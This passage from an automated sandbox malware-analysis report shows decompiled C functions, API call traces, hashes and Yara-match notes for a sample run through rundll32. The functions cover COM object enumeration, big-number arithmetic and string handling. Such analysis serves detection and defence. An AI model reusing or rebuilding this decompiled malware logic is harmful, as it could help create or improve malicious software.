                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                            • String ID:
                            • API String ID: 3193056040-0
                            • Opcode ID: 53a10e1d33c373dfcb9370be0a1fc1e0c1e4792ca819d31cc96fdf3d2b8ca1e0
                            • Instruction ID: 09b7b9ecf157f36a34c0dcad470eb403383ffc52276e27d0b50d77ca0bcabba5
                            • Opcode Fuzzy Hash: 53a10e1d33c373dfcb9370be0a1fc1e0c1e4792ca819d31cc96fdf3d2b8ca1e0
                            • Instruction Fuzzy Hash: 29513C76900649BFDB01CFA8C844A9EB7BAFFC8744F158429E905DB220EB75ED06CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E04A12732(intOrPtr* __eax) {
                            				void* _v8;
                            				WCHAR* _v12;
                            				void* _v16;
                            				char _v20;
                            				void* _v24;
                            				intOrPtr _v28;
                            				void* _v32;
                            				intOrPtr _v40;
                            				short _v48;
                            				intOrPtr _v56;
                            				short _v64;
                            				intOrPtr* _t54;
                            				intOrPtr* _t56;
                            				intOrPtr _t57;
                            				intOrPtr* _t58;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr* _t63;
                            				intOrPtr* _t65;
                            				short _t67;
                            				intOrPtr* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t72;
                            				intOrPtr* _t75;
                            				intOrPtr* _t77;
                            				intOrPtr _t79;
                            				intOrPtr* _t83;
                            				intOrPtr* _t87;
                            				intOrPtr _t103;
                            				intOrPtr _t109;
                            				void* _t118;
                            				void* _t122;
                            				void* _t123;
                            				intOrPtr _t130;
                            
                            				_t123 = _t122 - 0x3c;
                            				_push( &_v8);
                            				_push(__eax);
                            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                            				if(_t118 >= 0) {
                            					_t54 = _v8;
                            					_t103 =  *0x4a1a348; // 0xb1d5a8
                            					_t5 = _t103 + 0x4a1b038; // 0x3050f485
                            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                            					_t56 = _v8;
                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                            					if(_t118 >= 0) {
                            						__imp__#2(0x4a19290);
                            						_v28 = _t57;
                            						if(_t57 == 0) {
                            							_t118 = 0x8007000e;
                            						} else {
                            							_t60 = _v32;
                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                            							_t87 = __imp__#6;
                            							_t118 = _t61;
                            							if(_t118 >= 0) {
                            								_t63 = _v24;
                            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                            								if(_t118 >= 0) {
                            									_t130 = _v20;
                            									if(_t130 != 0) {
                            										_t67 = 3;
                            										_v64 = _t67;
                            										_v48 = _t67;
                            										_v56 = 0;
                            										_v40 = 0;
                            										if(_t130 > 0) {
                            											while(1) {
                            												_t68 = _v24;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t123 = _t123;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                            												if(_t118 < 0) {
                            													goto L16;
                            												}
                            												_t70 = _v8;
                            												_t109 =  *0x4a1a348; // 0xb1d5a8
                            												_t28 = _t109 + 0x4a1b0bc; // 0x3050f1ff
                            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                            												if(_t118 >= 0) {
                            													_t75 = _v16;
                            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                            													if(_t118 >= 0 && _v12 != 0) {
                            														_t79 =  *0x4a1a348; // 0xb1d5a8
                            														_t33 = _t79 + 0x4a1b078; // 0x76006f
                            														if(lstrcmpW(_v12, _t33) == 0) {
                            															_t83 = _v16;
                            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                            														}
                            														 *_t87(_v12);
                            													}
                            													_t77 = _v16;
                            													 *((intOrPtr*)( *_t77 + 8))(_t77);
                            												}
                            												_t72 = _v8;
                            												 *((intOrPtr*)( *_t72 + 8))(_t72);
                            												_v40 = _v40 + 1;
                            												if(_v40 < _v20) {
                            													continue;
                            												}
                            												goto L16;
                            											}
                            										}
                            									}
                            								}
                            								L16:
                            								_t65 = _v24;
                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                            							}
                            							 *_t87(_v28);
                            						}
                            						_t58 = _v32;
                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                            					}
                            				}
                            				return _t118;
                            			}


                            APIs
                            • SysAllocString.OLEAUT32(04A19290), ref: 04A12782
                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04A12863
                            • SysFreeString.OLEAUT32(00000000), ref: 04A1287C
                            • SysFreeString.OLEAUT32(?), ref: 04A128AB
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: a82b9576519fc084f8ae44d784602ae09a704e9f92da25272933a15d4cef7d02
                            • Instruction ID: 0dfe7531b2296bc31ec428be42f1398e52f50d59a3bbf4c774f6996ffc136145
                            • Opcode Fuzzy Hash: a82b9576519fc084f8ae44d784602ae09a704e9f92da25272933a15d4cef7d02
                            • Instruction Fuzzy Hash: 95514E76D00519EFDB00DFA8C588AAEB7B9EF88700B144598E915FB224D731AD41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?), ref: 04F82E89
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • ResetEvent.KERNEL32(?,?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6), ref: 04F82F00
                            • GetLastError.KERNEL32(?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82F2D
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • GetLastError.KERNEL32(?,?,?,04F7DD27,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82FEF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                            • String ID:
                            • API String ID: 943265810-0
                            • Opcode ID: 512470257f0d222de0e0de9a9d4f238de2c2e4d0fe13b3fc6ee4ce090076d12f
                            • Instruction ID: 36e6b2e5bc95cbd7781e937908342d24599d943ca0518d5c9a5e7dfafe3c49ac
                            • Opcode Fuzzy Hash: 512470257f0d222de0e0de9a9d4f238de2c2e4d0fe13b3fc6ee4ce090076d12f
                            • Instruction Fuzzy Hash: 6F4163B2600208BFE721AFA4DC89EBB7BACEB44305B01496DF502D9191E774F945DA60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F74E5C
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F74E72
                            • memset.NTDLL ref: 04F74F1B
                            • memset.NTDLL ref: 04F74F31
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: e507e43b9f597b635d1178dbab01abbbb548c1b66c33fd0f28e5cdaa91afde32
                            • Instruction ID: 4aec6eae4dd103ff353cdaa05fa01b1452a0df53f5ce964384d580c6d63b78a1
                            • Opcode Fuzzy Hash: e507e43b9f597b635d1178dbab01abbbb548c1b66c33fd0f28e5cdaa91afde32
                            • Instruction Fuzzy Hash: 41418431A00219AFEF109F68DC80FEE7769EF45724F00856AF91AA7280DB74BD56CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E04A11DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void _v156;
                            				void _v428;
                            				void* _t55;
                            				unsigned int _t56;
                            				signed int _t66;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t79;
                            				void* _t81;
                            				void* _t92;
                            				void* _t96;
                            				signed int* _t99;
                            				signed int _t101;
                            				signed int _t103;
                            				void* _t107;
                            
                            				_t92 = _a12;
                            				_t101 = __eax;
                            				_t55 = E04A12FAB(_a16, _t92);
                            				_t79 = _t55;
                            				if(_t79 == 0) {
                            					L18:
                            					return _t55;
                            				}
                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                            				_t81 = 0;
                            				_t96 = 0x20;
                            				if(_t56 == 0) {
                            					L4:
                            					_t97 = _t96 - _t81;
                            					_v12 = _t96 - _t81;
                            					E04A11CC1(_t79,  &_v428);
                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04A12920(_t101,  &_v428, _a8, _t96 - _t81);
                            					E04A12920(_t79,  &_v156, _a12, _t97);
                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                            					_t66 = E04A11CC1(_t101, 0x4a1a1d0);
                            					_t103 = _t101 - _t79;
                            					_a8 = _t103;
                            					if(_t103 < 0) {
                            						L17:
                            						E04A11CC1(_a16, _a4);
                            						E04A13ADA(_t79,  &_v428, _a4, _t97);
                            						memset( &_v428, 0, 0x10c);
                            						_t55 = memset( &_v156, 0, 0x84);
                            						goto L18;
                            					}
                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                            					do {
                            						if(_v8 != 0xffffffff) {
                            							_push(1);
                            							_push(0);
                            							_push(0);
                            							_push( *_t99);
                            							L04A1824A();
                            							_t74 = _t66 +  *(_t99 - 4);
                            							asm("adc edx, esi");
                            							_push(0);
                            							_push(_v8 + 1);
                            							_push(_t92);
                            							_push(_t74);
                            							L04A18244();
                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                            								_t74 = _t74 | 0xffffffff;
                            								_v16 = _v16 & 0x00000000;
                            							}
                            						} else {
                            							_t74 =  *_t99;
                            						}
                            						_t106 = _t107 + _a8 * 4 - 0x1a8;
                            						_a12 = _t74;
                            						_t76 = E04A1241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                            						while(1) {
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							L13:
                            							_t92 =  &_v156;
                            							if(E04A12378(_t79, _t92, _t106) < 0) {
                            								break;
                            							}
                            							L14:
                            							_a12 = _a12 + 1;
                            							_t76 = E04A179CC(_t79,  &_v156, _t106, _t106);
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							goto L13;
                            						}
                            						_a8 = _a8 - 1;
                            						_t66 = _a12;
                            						_t99 = _t99 - 4;
                            						 *(0x4a1a1d0 + _a8 * 4) = _t66;
                            					} while (_a8 >= 0);
                            					_t97 = _v12;
                            					goto L17;
                            				}
                            				while(_t81 < _t96) {
                            					_t81 = _t81 + 1;
                            					_t56 = _t56 >> 1;
                            					if(_t56 != 0) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				goto L4;
                            			}


                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04A11E96
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04A11EAC
                            • memset.NTDLL ref: 04A11F55
                            • memset.NTDLL ref: 04A11F6B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 6da5233a4f275b729688821f66cff686bcf0c648f28868573a9d9b76671d156b
                            • Instruction ID: f15798c4e67541694092e055a5aef461b2f1f0bbffd5896c7e4a71109105ffab
                            • Opcode Fuzzy Hash: 6da5233a4f275b729688821f66cff686bcf0c648f28868573a9d9b76671d156b
                            • Instruction Fuzzy Hash: 5341D532A00219AFEF10DFA8DD84BEE7775EF49314F004569F919A72A0DB70BE558B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ResetEvent.KERNEL32(?,00000000,00000000,00000000,04F63EC6,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7C7D5
                            • GetLastError.KERNEL32(?,?,?,04F63EC6,?,?), ref: 04F7C7EE
                            • ResetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7C867
                            • GetLastError.KERNEL32(?,?,?,04F63EC6,?,?), ref: 04F7C882
                              • Part of subcall function 04F7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                              • Part of subcall function 04F7EC09: SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$ErrorLastReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 1123145548-0
                            • Opcode ID: dcb48f95a2f6cb646f4389273c49eacfc862bcb8fa572b4c72f22cefa62917f2
                            • Instruction ID: 3f569fda857804f56899e923de8e89da87228204041ec2b70e0514e395448afc
                            • Opcode Fuzzy Hash: dcb48f95a2f6cb646f4389273c49eacfc862bcb8fa572b4c72f22cefa62917f2
                            • Instruction Fuzzy Hash: 14410932E00644EBEB119FA4DC44EAE77B9EF88364F14056AE512E7150E778F942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrRChrA.SHLWAPI(?,00000000,00000023,?), ref: 04F79A93
                            • StrChrA.SHLWAPI(?,0000005C), ref: 04F79ABA
                            • lstrcpyn.KERNEL32(00000005,?,00000001,00000001), ref: 04F79AE0
                            • lstrcpy.KERNEL32(?,?), ref: 04F79B84
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrcpyn
                            • String ID:
                            • API String ID: 4154805583-0
                            • Opcode ID: 8b5338ded040d32555ffacf82377bdd31516b62534c069c26114eefaa644d0ad
                            • Instruction ID: a2bcd64a15cb7a5e0dd12bb0e8c49dcfb643cfeeb29a8828838c436a3fe9cbb5
                            • Opcode Fuzzy Hash: 8b5338ded040d32555ffacf82377bdd31516b62534c069c26114eefaa644d0ad
                            • Instruction Fuzzy Hash: 40414DB6900119BFEB11DFA8DC84DEE7BBCEF09354F0445A6E911E7140D678AB45CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strupr
                            • String ID:
                            • API String ID: 3408778250-0
                            • Opcode ID: 8f989e1e448b755ad7998d526c5dab087664e967362942fcd92101bac0a4f528
                            • Instruction ID: 0e739d6eb040d263cee84fb2a8a29177c9f28c76bfe0dfe34747d20473056dde
                            • Opcode Fuzzy Hash: 8f989e1e448b755ad7998d526c5dab087664e967362942fcd92101bac0a4f528
                            • Instruction Fuzzy Hash: C8412FB28002099EEF21EF68D884EFE77E9EF45344F10441AE925DA120E7B8F556CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69D46: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 04F69D54
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F648C0
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F64911
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 04F6F3DB
                              • Part of subcall function 04F6F39B: GetLastError.KERNEL32 ref: 04F6F3E5
                              • Part of subcall function 04F6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 04F6F40A
                              • Part of subcall function 04F6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 04F6F42D
                              • Part of subcall function 04F6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 04F6F455
                              • Part of subcall function 04F6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 04F6F46A
                              • Part of subcall function 04F6F39B: SetEndOfFile.KERNEL32(00001000), ref: 04F6F477
                              • Part of subcall function 04F6F39B: CloseHandle.KERNEL32(00001000), ref: 04F6F48F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 04F64946
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 04F64956
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                            • String ID:
                            • API String ID: 4200334623-0
                            • Opcode ID: 91e0f28f41263ed4a2172ddb8b9d8ff4d88a47c740e934d981135eb7c8e82e0d
                            • Instruction ID: 351db4ddaabefa6d9412b078293686d00ef55c4cd7cf6ed7f91de8fe8f4b715e
                            • Opcode Fuzzy Hash: 91e0f28f41263ed4a2172ddb8b9d8ff4d88a47c740e934d981135eb7c8e82e0d
                            • Instruction Fuzzy Hash: A931EAB6900019BFDB10DFA4DC88CBEBBBDEB09254B110069F605EB110D775AE55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                            • SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            • GetLastError.KERNEL32 ref: 04F7ECB9
                              • Part of subcall function 04F7F197: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,04F82F4B,0000EA60,?,?,?,04F7DD27,00000000,0000EA60,00000000), ref: 04F7F1B2
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • GetLastError.KERNEL32(00000000), ref: 04F7ECEE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 602384898-0
                            • Opcode ID: b14c4f8d3802358e136caeadb4413fad0aa7423dc4389673a7d64d0af556627a
                            • Instruction ID: c0eed435c6bc745bc99ec5ee62a36500b8e335ddd2edcb8e7c6e7a33ffe1e6fb
                            • Opcode Fuzzy Hash: b14c4f8d3802358e136caeadb4413fad0aa7423dc4389673a7d64d0af556627a
                            • Instruction Fuzzy Hash: 8531F0B5D00309FFDB20DFA5DC849AEBBB8EF04305F1489ABE502A6250D779AA45DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F7A8C1
                            • memcpy.NTDLL(00000018,?,?), ref: 04F7A8EA
                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000BEC1,00000000,000000FF,00000008), ref: 04F7A929
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7A93C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2780211928-0
                            • Opcode ID: 0589fc348d7244653d8f8748a53a9393e2cb049b13b4e99501d8654e5ec9c87a
                            • Instruction ID: e92e8b28ec63818f426ebd464984fb95d1ffa8a1bbb3de52060a6ac07a0bdaad
                            • Opcode Fuzzy Hash: 0589fc348d7244653d8f8748a53a9393e2cb049b13b4e99501d8654e5ec9c87a
                            • Instruction Fuzzy Hash: 2F318570A00609AFDB108F64EC44EAB7BB8FF05724F01411EF955DA290D774ED15DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • TlsGetValue.KERNEL32(?), ref: 04F74BC8
                            • SetEvent.KERNEL32(?), ref: 04F74C12
                            • TlsSetValue.KERNEL32(00000001), ref: 04F74C4C
                            • TlsSetValue.KERNEL32(00000000), ref: 04F74C68
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$Event
                            • String ID:
                            • API String ID: 3803239005-0
                            • Opcode ID: 95ee874287374726b9cd745c1317acd808fcacc7e9e2dcd440d51940b9dad6c1
                            • Instruction ID: 027b75c3a52e5ef801185474f71de6a5a53a32da434e5c73042b70ac8eb8be3a
                            • Opcode Fuzzy Hash: 95ee874287374726b9cd745c1317acd808fcacc7e9e2dcd440d51940b9dad6c1
                            • Instruction Fuzzy Hash: 8621B031A00648AFDF229F68ED859AA7FA2FF41B10B10462EF412CA160D379FC52DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7550A: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,04F63EC6), ref: 04F75540
                              • Part of subcall function 04F7550A: memset.NTDLL ref: 04F755B6
                              • Part of subcall function 04F7550A: memset.NTDLL ref: 04F755CA
                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04F7F0F5
                            • lstrcmpi.KERNEL32(00000000,?), ref: 04F7F11C
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04F7F161
                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 04F7F172
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                            • String ID:
                            • API String ID: 1065503980-0
                            • Opcode ID: 43fd47834852c02edee115633bf721c38cff6a01c41d328525a888594e78b549
                            • Instruction ID: 16e7654d95f06010d80c94488d33d4eb4ddabbb8256b9256d7deffe7a2f498c1
                            • Opcode Fuzzy Hash: 43fd47834852c02edee115633bf721c38cff6a01c41d328525a888594e78b549
                            • Instruction Fuzzy Hash: D6215171A00109FFEF11AF64EC44EAE7BB9EF04358F10402AF915EA110D778AD5ADB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7E0F3
                            • lstrlen.KERNEL32(00000000), ref: 04F7E104
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • strcpy.NTDLL ref: 04F7E11B
                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04F7E125
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                            • String ID:
                            • API String ID: 528014985-0
                            • Opcode ID: 66d3c99e4c32151dd6645cf260601cb6551085ed0e1a3822acf548a505e16d1a
                            • Instruction ID: 07aea1bb0efd843ddd5ecb8db9095fc5bf9df7118cff6cc19f420178428fdf7e
                            • Opcode Fuzzy Hash: 66d3c99e4c32151dd6645cf260601cb6551085ed0e1a3822acf548a505e16d1a
                            • Instruction Fuzzy Hash: 0321A1B6500305AFE7105F24EC4AB3A77E8EF44755F00845FF8568B281EBF9E816C621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E04A1264F(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                            				intOrPtr _v8;
                            				void* _v12;
                            				void* _v16;
                            				intOrPtr _t26;
                            				intOrPtr* _t28;
                            				intOrPtr _t31;
                            				intOrPtr* _t32;
                            				void* _t39;
                            				int _t46;
                            				intOrPtr* _t47;
                            				int _t48;
                            
                            				_t47 = __eax;
                            				_push( &_v12);
                            				_push(__eax);
                            				_t39 = 0;
                            				_t46 = 0;
                            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                            				_v8 = _t26;
                            				if(_t26 < 0) {
                            					L13:
                            					return _v8;
                            				}
                            				if(_v12 == 0) {
                            					Sleep(0xc8);
                            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                            				}
                            				if(_v8 >= _t39) {
                            					_t28 = _v12;
                            					if(_t28 != 0) {
                            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                            						_v8 = _t31;
                            						if(_t31 >= 0) {
                            							_t46 = lstrlenW(_v16);
                            							if(_t46 != 0) {
                            								_t46 = _t46 + 1;
                            								_t48 = _t46 + _t46;
                            								_t39 = E04A16D63(_t48);
                            								if(_t39 == 0) {
                            									_v8 = 0x8007000e;
                            								} else {
                            									memcpy(_t39, _v16, _t48);
                            								}
                            								__imp__#6(_v16);
                            							}
                            						}
                            						_t32 = _v12;
                            						 *((intOrPtr*)( *_t32 + 8))(_t32);
                            					}
                            					 *_a4 = _t39;
                            					 *_a8 = _t46 + _t46;
                            				}
                            				goto L13;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeSleepStringlstrlenmemcpy
                            • String ID:
